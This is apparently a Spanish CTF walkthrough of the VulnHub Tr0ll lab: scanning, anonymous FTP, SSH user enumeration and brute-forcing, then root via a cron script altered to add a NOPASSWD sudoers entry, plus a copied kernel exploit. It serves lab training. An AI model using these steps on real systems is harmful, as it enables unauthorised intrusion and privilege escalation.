Introducción
Hoy os traigo otro CTF, este me llamó la atención en vulnhub por el propio título que tenía, Tr0ll. Lo podeis descargar del siguiente enlace:
https://www.vulnhub.com/entry/tr0ll-1,100/
Enumeración
Con un primer escaneo de puertos vemos que tiene abierto los siguientes servicios:
- ftp: con usuario anonymous habilitado y un archivo llamado lol.pcap
- http: una carpeta llamada /secret
- ssh
root@kali:/usr/local/src/Osmedeus# nmap -A 172.31.255.147 Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-13 19:08 CET Nmap scan report for 172.31.255.147 Host is up (0.00057s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rwxrwxrwx 1 1000 0 8068 Aug 09 2014 lol.pcap [NSE: writeable] | ftp-syst: | STAT: | FTP server status: | Connected to 172.31.255.129 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 600 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 3.0.2 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA) | 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA) | 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA) |_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/secret |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: Site doesn't have a title (text/html). MAC Address: 08:00:27:9D:1D:FA (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.57 ms 172.31.255.147 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Utilizamos nikto para descubrir posibles directorios ocultos, no nos indica ninguno nuevo a parte del /secret que ya hemos sacado con nmap:
root@kali:~# nikto --host http://172.31.255.147
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.31.255.147
+ Target Hostname: 172.31.255.147
+ Target Port: 80
+ Start Time: 2019-01-13 19:11:30 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x24 0x500438fe37ded
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/secret/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7536 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2019-01-13 19:11:42 (GMT1) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Si accedemos al directorio web principal nos aparece el primero troll:
Y si intentamos acceder al directorio /secret nos aparece otro:
Así que seguimos buscando, vamos a por el FTP. Nos conectamos y localizamos el fichero lol.pcap:
root@kali:~# ftp 172.31.255.147
Connected to 172.31.255.147.
220 (vsFTPd 3.0.2)
Name (172.31.255.147:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxrwxrwx 1 1000 0 8068 Aug 09 2014 lol.pcap
226 Directory send OK.
Descargamos el pcap:
ftp> get lol.pcap local: lol.pcap remote: lol.pcap 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for lol.pcap (8068 bytes). 226 Transfer complete. 8068 bytes received in 0.01 secs (535.3609 kB/s)
Con wireshark analizamos el pcap y vemos que es una sesión FTP con el usuario anonymous y este descarga el fichero secret_stuff.txt:
Dentro del fichero secret_stuff.txt encontramos lo siguiente:
Probamos de acceder vía web y encontramos un fichero, lo descargamos:
# wget http://172.31.255.147/sup3rs3cr3tdirlol/roflmao --2019-01-13 20:00:23-- http://172.31.255.147/sup3rs3cr3tdirlol/roflmao Connecting to 172.31.255.147:80... connected. HTTP request sent, awaiting response... 200 OK Length: 7296 (7,1K) Saving to: ‘roflmao’ roflmao 100%[=============================>] 7,12K --.-KB/s in 0s 2019-01-13 20:00:23 (42,5 MB/s) - ‘roflmao’ saved [7296/7296]
Parece que es un binario:
root@kali:/tmp# file roflmao roflmao: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=5e14420eaa59e599c2f508490483d959f3d2cf4f, not stripped
Damos permisos de ejecución y lo ejecutamos:
root@kali:/tmp# chmod +x roflmao root@kali:/tmp# ./roflmao Find address 0x0856BF to proceed root@kali:/tmp#
En un primer momento intento de convertir 0x0856BF de hexadecimal a decimal y otras combinaciones, pero me di contra un muro. Hasta que probé de introducirlo vía web y bingo:
Dentro de cada directorio encontramos diferentes ficheros:
- Pass.txt: contiene «Good_job_:)»_
http://172.31.255.150/0x0856BF/this_folder_contains_the_password/Pass.txt Good_job_:)
- which_one_lol.txt: una lista con posibles usuarios de sistema:
http://172.31.255.150/0x0856BF/good_luck/which_one_lol.txt maleus ps-aux felux Eagle11 genphlux < -- Definitely not this one usmc8892 blawrg wytshadow vis1t0r overflow
La maquina victima tiene una versión de SSH vulnerable a la enumeración de usuarios:
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
Con searchsploit lo confirmamos:
root@kali:/tmp# searchsploit openssh enumeration
-------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
-------------------------------------------------------------------- ----------------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration | exploits/linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) | exploits/linux/remote/45210.py
OpenSSH 7.2p2 - Username Enumeration | exploits/linux/remote/40136.py
OpenSSHd 7.2p2 - Username Enumeration | exploits/linux/remote/40113.txt
-------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Con metasploit cargamos el fichero de usuarios which_one_lol.txt y explotamos la vulnerabilidad:
msf > search openssh Matching Modules ================ Name Disclosure Date Rank Check Description ---- --------------- ---- ----- ----------- auxiliary/scanner/ssh/ssh_enumusers normal Yes SSH Username Enumeration msf > use auxiliary/scanner/ssh/ssh_enumusers msf auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE which_one_lol.txt msf auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 172.31.255.150 msf auxiliary(scanner/ssh/ssh_enumusers) > exploit [*] 172.31.255.150:22 - SSH - Using malformed packet technique [*] 172.31.255.150:22 - SSH - Starting scan [+] 172.31.255.150:22 - SSH - User 'maleus' found [+] 172.31.255.150:22 - SSH - User 'ps-aux' found [+] 172.31.255.150:22 - SSH - User 'felux' found [+] 172.31.255.150:22 - SSH - User 'Eagle11' found [+] 172.31.255.150:22 - SSH - User 'genphlux' found [+] 172.31.255.150:22 - SSH - User 'usmc8892' found [+] 172.31.255.150:22 - SSH - User 'blawrg' found [+] 172.31.255.150:22 - SSH - User 'wytshadow' found [+] 172.31.255.150:22 - SSH - User 'vis1t0r' found [+] 172.31.255.150:22 - SSH - User 'overflow' found [*] Scanned 1 of 1 hosts (100% complete)
Confirmamos que los usuarios existen a nivel de sistema. Vamos a probar fuerzabruta con los usuarios anteriores y como password «Pass.txt» ya que en la URL indicaba «this_folder_contains_the_password». Paciencia ya que la maquina victima tiene activado fail2ban y nos irá banenando cada X tiempo:
root@kali:/tmp# cat Pass.txt
Pass.txt
root@kali:~# nmap -p 22 --script ssh-brute --script-args userdb=/tmp/which_one_lol.txt,passdb=/tmp/Pass.txt,ssh-brute.timeout=4s 172.31.255.149
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-26 20:10 CET
NSE: [ssh-brute] Trying username/password pair: maleus:maleus
NSE: [ssh-brute] Trying username/password pair: ps-aux:ps-aux
NSE: [ssh-brute] Trying username/password pair: felux:felux
NSE: [ssh-brute] Trying username/password pair: Eagle11:eagle11
NSE: [ssh-brute] Trying username/password pair: genphlux:genphlux
NSE: [ssh-brute] Trying username/password pair: usmc8892:usmc8892
NSE: [ssh-brute] Trying username/password pair: blawrg:blawrg
NSE: [ssh-brute] Trying username/password pair: wytshadow:wytshadow
NSE: [ssh-brute] Trying username/password pair: vis1t0r:vis1t0r
NSE: [ssh-brute] Trying username/password pair: overflow:overflow
NSE: [ssh-brute] Trying username/password pair: maleus:Pass.txt
NSE: [ssh-brute] Trying username/password pair: ps-aux:Pass.txt
NSE: [ssh-brute] Trying username/password pair: felux:Pass.txt
NSE: [ssh-brute] Trying username/password pair: Eagle11:Pass.txt
NSE: [ssh-brute] Trying username/password pair: genphlux:Pass.txt
NSE: [ssh-brute] Trying username/password pair: usmc8892:Pass.txt
NSE: [ssh-brute] Trying username/password pair: blawrg:Pass.txt
NSE: [ssh-brute] Trying username/password pair: wytshadow:Pass.txt
NSE: [ssh-brute] Trying username/password pair: vis1t0r:Pass.txt
NSE: [ssh-brute] Trying username/password pair: overflow:Pass.txt
Nmap scan report for 172.31.255.149
Host is up (0.00039s latency).
PORT STATE SERVICE
22/tcp open ssh
| ssh-brute:
| Accounts:
| overflow:Pass.txt - Valid credentials
|_ Statistics: Performed 20 guesses in 70 seconds, average tps: 0.5
MAC Address: 08:00:27:CD:88:27 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 70.22 seconds
Ya tenemos las credenciales, ahora podemos conectarnos vía ssh:
root@kali:/tmp# ssh [email protected] [email protected]'s password: Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic i686) * Documentation: https://help.ubuntu.com/ New release '16.04.5 LTS' available. Run 'do-release-upgrade' to upgrade to it. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Sat Jan 26 11:22:49 2019 from 172.31.255.129 Could not chdir to home directory /home/overflow: No such file or directory $
Abrimos una shell bash:
$ /bin/bash overflow@troll:/home$
Escalar privilegios – Método 1
Empezamos a listar las posibles formas de escalar privilegios a nivel de sistema.
Probamos con sudo, pero el usuario no tienen ningún permiso asignado:
overflow@troll:/home$ sudo su
sudo: unable to resolve host troll
[sudo] password for overflow:
overflow is not in the sudoers file. This incident will be reported.
Buscamos ficheros con permisos uuid sin éxito:
overflow@troll:/home$ find / -perm -u=s -type f 2>/dev/null /usr/sbin/uuidd /usr/sbin/pppd /usr/bin/chfn /usr/bin/sudo /usr/bin/passwd /usr/bin/traceroute6.iputils /usr/bin/mtr /usr/bin/chsh /usr/bin/newgrp /usr/bin/gpasswd /usr/lib/pt_chown /usr/lib/openssh/ssh-keysign /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /bin/su /bin/ping /bin/fusermount /bin/ping6 /bin/mount /bin/umount
Listamos los procesos que se estén ejecutando con usuario root:
overflow@troll:/$ ps aux | grep root root 1 0.0 0.4 4200 2256 ? Ss 10:28 0:00 /sbin/init root 2 0.0 0.0 0 0 ? S 10:28 0:00 [kthreadd] root 3 0.0 0.0 0 0 ? S 10:28 0:00 [ksoftirqd/0] root 5 0.0 0.0 0 0 ? S< 10:28 0:00 [kworker/0:0H] root 7 0.0 0.0 0 0 ? S 10:28 0:00 [rcu_sched] root 8 0.0 0.0 0 0 ? S 10:28 0:00 [rcu_bh] root 9 0.0 0.0 0 0 ? S 10:28 0:00 [migration/0] root 10 0.0 0.0 0 0 ? S 10:28 0:00 [watchdog/0] root 11 0.0 0.0 0 0 ? S< 10:28 0:00 [khelper] root 12 0.0 0.0 0 0 ? S 10:28 0:00 [kdevtmpfs] root 13 0.0 0.0 0 0 ? S< 10:28 0:00 [netns] root 14 0.0 0.0 0 0 ? S< 10:28 0:00 [writeback] root 15 0.0 0.0 0 0 ? S< 10:28 0:00 [kintegrityd] root 16 0.0 0.0 0 0 ? S< 10:28 0:00 [bioset] root 17 0.0 0.0 0 0 ? S< 10:28 0:00 [kworker/u3:0] root 18 0.0 0.0 0 0 ? S< 10:28 0:00 [kblockd] root 19 0.0 0.0 0 0 ? S< 10:28 0:00 [ata_sff] root 20 0.0 0.0 0 0 ? S 10:28 0:00 [khubd] root 21 0.0 0.0 0 0 ? S< 10:28 0:00 [md] root 22 0.0 0.0 0 0 ? S< 10:28 0:00 [devfreq_wq] root 23 0.0 0.0 0 0 ? S 10:28 0:01 [kworker/0:1] root 25 0.0 0.0 0 0 ? S 10:28 0:00 [khungtaskd] root 26 0.0 0.0 0 0 ? S 10:28 0:00 [kswapd0] root 27 0.0 0.0 0 0 ? SN 10:28 0:00 [ksmd] root 28 0.0 0.0 0 0 ? S 10:28 0:00 [fsnotify_mark] root 29 0.0 0.0 0 0 ? S 10:28 0:00 [ecryptfs-kthrea] root 30 0.0 0.0 0 0 ? S< 10:28 0:00 [crypto] root 42 0.0 0.0 0 0 ? S< 10:28 0:00 [kthrotld] root 44 0.0 0.0 0 0 ? S 10:28 0:00 [kworker/u2:1] root 45 0.0 0.0 0 0 ? S 10:28 0:00 [scsi_eh_0] root 46 0.0 0.0 0 0 ? S 10:28 0:00 [scsi_eh_1] root 47 0.0 0.0 0 0 ? S 10:28 0:00 [kworker/u2:2] root 68 0.0 0.0 0 0 ? S< 10:28 0:00 [deferwq] root 69 0.0 0.0 0 0 ? S< 10:28 0:00 [charger_manager] root 121 0.0 0.0 0 0 ? S< 10:28 0:00 [kpsmoused] root 122 0.0 0.0 0 0 ? S 10:28 0:00 [kworker/0:2] root 123 0.0 0.0 0 0 ? S 10:29 0:00 [scsi_eh_2] root 133 0.0 0.0 0 0 ? S< 10:29 0:00 [kworker/u3:1] root 134 0.0 0.0 0 0 ? S 10:29 0:00 [jbd2/sda1-8] root 135 0.0 0.0 0 0 ? S< 10:29 0:00 [ext4-rsv-conver] root 265 0.0 0.1 3016 620 ? S 10:29 0:00 upstart-udev-bridge --daemon root 270 0.0 0.2 12008 1444 ? Ss 10:29 0:00 /lib/systemd/systemd-udevd --daemon root 368 0.0 0.3 4220 1712 ? Ss 10:29 0:00 /lib/systemd/systemd-logind root 400 0.0 0.1 3024 604 ? S 10:29 0:00 upstart-file-bridge --daemon root 502 0.0 0.1 2876 644 ? S 10:29 0:00 upstart-socket-bridge --daemon root 619 0.0 0.4 5520 2320 ? Ss 10:29 0:00 dhclient -1 -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0 root 667 0.0 0.1 4784 956 ? Ss 10:29 0:00 /usr/sbin/vsftpd root 758 0.0 0.1 4652 840 tty4 Ss+ 10:29 0:00 /sbin/getty -8 38400 tty4 root 761 0.0 0.1 4652 852 tty5 Ss+ 10:29 0:00 /sbin/getty -8 38400 tty5 root 764 0.0 0.1 4652 836 tty2 Ss+ 10:29 0:00 /sbin/getty -8 38400 tty2 root 765 0.0 0.1 4652 844 tty3 Ss+ 10:29 0:00 /sbin/getty -8 38400 tty3 root 767 0.0 0.1 4652 844 tty6 Ss+ 10:29 0:00 /sbin/getty -8 38400 tty6 root 789 0.0 0.4 7800 2512 ? Ss 10:29 0:00 /usr/sbin/sshd -D root 793 0.0 0.1 3060 824 ? Ss 10:29 0:00 cron root 895 0.0 0.4 5616 2532 ? Ss 10:29 0:00 /usr/sbin/apache2 -k start root 974 0.0 1.3 38660 6996 ? Sl 10:29 0:01 /usr/bin/python /usr/bin/fail2ban-server -b -s /var/run/fail2ban/fail2ban.sock -p /var/run/fail2ban/fail2ban.pid root 1029 0.0 0.1 4652 848 tty1 Ss+ 10:29 0:00 /sbin/getty -8 38400 tty1 root 1044 0.0 0.0 0 0 ? S 10:30 0:00 [kauditd] root 1816 0.1 0.7 11200 3628 ? Ss 11:31 0:00 sshd: overflow [priv] overflow 1846 0.0 0.1 4656 540 pts/0 S+ 11:31 0:00 grep root
El fichero crontab está protegido contra lectura, así que no podemos revisar su contenido:
overflow@troll:/etc/cron.d$ cat /etc/crontab
cat: /etc/crontab: Permission denied
Tampoco encontramos nada en el directorio cron.d:
overflow@troll:/etc/cron.d$ ls -liath total 12K 12 drwxr-xr-x 86 root root 4.0K Jan 20 13:15 .. 348 drwxr-xr-x 2 root root 4.0K Aug 9 2014 . 349 -rw-r--r-- 1 root root 102 Feb 8 2013 .placeholder
Buscamos ficheros con permisos de escritura para el grupo others y aparecen dos interesantes:
overflow@troll:/$ find / -perm -o=w -type f 2>/dev/null /srv/ftp/lol.pcap /var/tmp/cleaner.py.swp /var/www/html/sup3rs3cr3tdirlol/roflmao /var/log/cronlog ........... /lib/log/cleaner.py
Si revisamos el contenido del cronlog, vemos que hay un un script cleaner.py que se ejecuta cada dos minutos:
overflow@troll:/etc/cron.d$ cat /var/log/cronlog */2 * * * * cleaner.py
Y el script en cuestión:
overflow@troll:/etc/cron.d$ ls -liath /lib/log/cleaner.py
155826 -rwxrwxrwx 1 root root 96 Aug 13 2014 /lib/log/cleaner.py
overflow@troll:/etc/cron.d$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
except:
sys.exit()
Aprovechando que tenemos permisos de escritura sobre el script cleaner.py vamos a modificarlo, si intentamos editarlo con vi nos aparece lo siguiente:
Found a swap file by the name "/var/tmp/cleaner.py.swp" owned by: root dated: Wed Aug 13 01:16:40 2014 [cannot be read] While opening file "/lib/log/cleaner.py" dated: Wed Aug 13 00:13:39 2014 (1) Another program may be editing the same file. If this is the case, be careful not to end up with two different instances of the same file when making changes. Quit, or continue with caution. (2) An edit session for this file crashed. If this is the case, use ":recover" or "vim -r /lib/log/cleaner.py" to recover the changes (see ":help recovery"). If you did this already, delete the swap file "/var/tmp/cleaner.py.swp" to avoid this message. Swap file "/var/tmp/cleaner.py.swp" already exists! [O]pen Read-Only, (E)dit anyway, (R)ecover, (D)elete it, (Q)uit, (A)bort:
Como no tenemos permisos para eliminar el fichero /var/tmp/cleaner.py.swp utilizaremos nano (muy a mi pesar):
overflow@troll:/$ nano /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
os.system('rm -r /tmp/* ')
os.system('echo "overflow ALL=(ALL) NOPASSWD: ALL" > /etc/sudoers.d/overflow')
os.system('chmod 0440 /etc/sudoers.d/overflow')
except:
sys.exit()
Lo que estamos haciendo, es dando permisos de sudo al usuario overflow para que pueda ejecutar todos los comandos del sistema sin necesidad de introducir password. En menos de dos minutos, ya vemos aparecer el fichero «overflow» en el directorio sudoers.d:
overflow@troll:/$ ls -liath /etc/sudoers.d
total 16K
725 drwxr-xr-x 2 root root 4.0K Jan 26 11:48 .
39752 -r--r----- 1 root root 33 Jan 26 11:48 overflow
Abrimos una nueva sesión ssh, ejecutamos «sudo su» y ya tendremos acceso al sistema:
Escalación privilegios – método 2
Verificamos la versión del kernel:
overflow@troll:/home$ uname -a
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux
Buscamos exploits que coincidan con la versión del kernel:
root@kali:~# searchsploit Linux kernel 3.13
------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------- ----------------------------------------
Linux Kernel 3.13 - SGID Privilege Escalation | exploits/linux/local/33824.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Loca | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Loca | exploits/linux/local/37293.txt
Linux Kernel 3.13.1 - 'Recvmmsg' Local Privilege Escalation (Metasploit) | exploits/linux/local/40503.rb
Linux Kernel 3.13/3.14 (Ubuntu) - 'splice()' System Call Local Denial of Servi | exploits/linux/dos/36743.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10 x64) - 'CONFIG_X86_X32=y' Local | exploits/linux_x86-64/local/31347.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write (2 | exploits/linux/local/31346.c
Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat (PoC) | exploits/linux/dos/31305.c
------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Lo copiamos a la maquina victima:
scp /usr/share/exploitdb/exploits/linux/local/37292.c [email protected]:/tmp/
Compilamos y ejecutamos:
La explotación del kernel es la que intento dejar siempre para el final, ya que es la menos «bonita» a mi parecer.
Deja una respuesta